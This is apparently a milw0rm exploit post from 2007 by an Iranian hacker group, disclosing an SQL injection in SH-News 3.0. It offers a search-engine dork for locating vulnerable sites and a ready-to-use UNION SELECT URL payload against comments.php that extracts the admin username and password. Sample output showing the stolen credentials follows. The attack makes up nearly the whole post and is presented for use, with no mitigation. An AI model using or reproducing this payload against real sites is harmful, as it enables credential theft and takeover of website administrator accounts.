######################################################################## # # # ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::.... # ######################################################################## Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 ----------------------------------- dork: Powered by SH-News 3.0 ----------------------------------- vlu: http://site.com/patch/comments.php?id=-1'union%20select%201,2,nick,4,5,password,7%20from%20shnews3_users%20where%20id=1/* ------------------------------------- you can see somting such as: Poster: admin Posted: 01.01.1970 03:30 z4478ad ############# 'admin' is admin user & 'z4478ad' is admin password ------------------------------------- # milw0rm.com [2007-12-09]